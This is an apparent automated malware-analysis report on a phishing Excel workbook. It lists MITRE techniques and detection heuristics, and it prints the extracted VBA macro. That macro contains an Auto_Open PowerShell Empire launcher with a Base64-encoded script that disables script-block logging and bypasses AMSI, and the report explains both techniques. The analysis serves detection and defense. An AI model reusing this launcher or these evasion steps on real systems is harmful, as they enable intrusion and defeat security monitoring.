Verdict: MALICIOUS
Risk Score: 320
Malware Insights

MITRE ATT&CK
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
This malicious Excel workbook carries a VBA project whose Auto_Open macro calls a function (F) that assembles a PowerShell command line from concatenated string literals (the vKBjoV variable in the preview below). The command is powershell -noP -sta -w 1 -enc followed by a Base64 blob: no profile, single-threaded apartment, hidden window, and a script body encoded as Base64 over UTF-16LE. The visible part of that script is the preamble used by the PowerShell Empire launcher. It reflects into System.Management.Automation.Utils.cachedGroupPolicySettings and sets EnableScriptBlockLogging and EnableScriptBlockInvocationLogging to 0 for the running process (if that field is not found, it instead replaces the ScriptBlock 'signatures' set with an empty HashSet), then sets System.Management.Automation.AmsiUtils.amsiInitFailed to $true so AMSI stops scanning the rest of the session. The obfuscation is the usual Empire style: random casing, split strings such as 'ScriptB'+'lockLogging', and backtick escapes such as "GETFie`Ld", all aimed at keyword-based detection rather than at a human reader. The preview is cut off before the rest of the script; the Shell()/WScript.Shell/CreateObject usage flagged by the heuristics below also lies in the truncated part, and the analyzer's assessment is that the remainder downloads and executes a second-stage payload. The workbook body presents a fake form requesting sensitive payment details, indicating a phishing or scam attempt.
Heuristics (7)

| Heuristic | Severity | ID | Detail |
|---|---|---|---|
| VBA project inside OOXML | medium | OOXML_VBA | Document contains a VBA project (VBA macros present); 6 related findings |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| WScript.Shell usage | critical | OLE_VBA_WSCRIPT | WScript.Shell usage |
| PowerShell reference in VBA | critical | OLE_VBA_PS | PowerShell reference in VBA |
| Auto_Open macro | high | OLE_VBA_AUTO | Auto_Open macro |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8939 bytes | 12ba3d6bc8b739e852532689dd2bea9e7eb567f32e5cb9d938af440179212e4a |
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Module1"
Sub Auto_Open()
F
End Sub
Public Function F() As Variant
Dim vKBjoV As String
vKBjoV = "powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVg"
vKBjoV = vKBjoV + "BFAHIAcwBpAE8AbgBUAEEAQgBsAEUALgBQAFMAVgBFAFIAUwBp"
vKBjoV = vKBjoV + "AE8ATgAuAE0AYQBqAE8AUgAgAC0AZwBlACAAMwApAHsAJAAwAD"
vKBjoV = vKBjoV + "AAMQA9AFsAUgBFAGYAXQAuAEEAcwBzAGUATQBCAEwAeQAuAEcA"
vKBjoV = vKBjoV + "ZQBUAFQAeQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ"
vKBjoV = vKBjoV + "BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBV"
vKBjoV = vKBjoV + "AHQAaQBsAHMAJwApAC4AIgBHAEUAVABGAGkAZQBgAEwAZAAiAC"
vKBjoV = vKBjoV + "gAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkA"
vKBjoV = vKBjoV + "UwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQ"
vKBjoV = vKBjoV + "BiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJAAw"
vKBjoV = vKBjoV + "ADAAMQApAHsAJAAwADYAYgA9ACQAMAAwADEALgBHAGUAdABWAE"
vKBjoV = vKBjoV + "EAbAB1AGUAKAAkAG4AVQBsAEwAKQA7AEkAZgAoACQAMAA2AGIA"
vKBjoV = vKBjoV + "WwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZw"
vKBjoV = vKBjoV + "BnAGkAbgBnACcAXQApAHsAJAAwADYAQgBbACcAUwBjAHIAaQBw"
vKBjoV = vKBjoV + "AHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAF"
vKBjoV = vKBjoV + "sAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwA"
vKBjoV = vKBjoV + "bwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAAwADYAQg"
vKBjoV = vKBjoV + "BbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBn"
vKBjoV = vKBjoV + "AGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAH"
vKBjoV = vKBjoV + "AAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8A"
vKBjoV = vKBjoV + "ZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATA"
vKBjoV = vKBjoV + "BsAGUAQwBUAEkATwBuAHMALgBHAGUATgBlAHIAaQBDAC4ARABJ"
vKBjoV = vKBjoV + "AEMAdABJAE8AbgBhAHIAWQBbAHMAdAByAEkAbgBHACwAUwB5AF"
vKBjoV = vKBjoV + "MAVABFAG0ALgBPAGIAagBlAGMAdABdAF0AOgA6AG4AZQBXACgA"
vKBjoV = vKBjoV + "KQA7ACQAdgBhAGwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUw"
vKBjoV = vKBjoV + "BjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBu"
vKBjoV = vKBjoV + "AGcAJwAsADAAKQA7ACQAVgBhAEwALgBBAGQAZAAoACcARQBuAG"
vKBjoV = vKBjoV + "EAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8A"
vKBjoV = vKBjoV + "YwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJA"
vKBjoV = vKBjoV + "AwADYAYgBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBD"
vKBjoV = vKBjoV + "AEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAG"
vKBjoV = vKBjoV + "MAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQA"
vKBjoV = vKBjoV + "bwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQ"
vKBjoV = vKBjoV + "BwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBd"
vKBjoV = vKBjoV + "AD0AJABWAEEAbAB9AEUATABTAEUAewBbAFMAYwByAGkAUAB0AE"
vKBjoV = vKBjoV + "IATABPAEMASwBdAC4AIgBHAGUAVABGAEkARQBgAEwARAAiACgA"
vKBjoV = vKBjoV + "JwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbw"
vKBjoV = vKBjoV + "BuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBF"
vKBjoV = vKBjoV + "AHQAVgBhAGwAVQBlACgAJABOAHUAbABsACwAKABOAGUAdwAtAE"
vKBjoV = vKBjoV + "8AQgBqAGUAYwB0ACAAQwBPAEwAbABFAGMAdABJAG8AbgBzAC4A"
vKBjoV = vKBjoV + "RwBlAG4AZQByAGkAQwAuAEgAQQBTAEgAUwBlAFQAWwBTAFQAUg"
vKBjoV = vKBjoV + "BJAG4AZwBdACkAKQB9ACQAUgBlAGYAPQBbAFIAZQBmAF0ALgBB"
vKBjoV = vKBjoV + "AHMAcwBFAE0AYgBsAHkALgBHAEUAVABUAFkAUABlACgAJwBTAH"
vKBjoV = vKBjoV + "kAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUA"
vKBjoV = vKBjoV + "dABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQ"
vKBjoV = vKBjoV + "BsAHMAJwApADsAJABSAEUAZgAuAEcARQBUAEYAaQBlAEwAZAAo"
vKBjoV = vKBjoV + "ACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkAC"
vKBjoV = vKBjoV + "cALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMA"
vKBjoV = vKBjoV + "JwApAC4AUwBlAHQAVgBhAEwAVQBFACgAJABuAHUAbABMACwAJA"
vKBjoV = vKBjoV + "BUAFIAVQBFACkAOwB9ADsAWwBT
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 26112 bytes | 91a1dca372d87e32aa8339c3069d55239ea58d34e66c15f3a50f4b399fb26492 |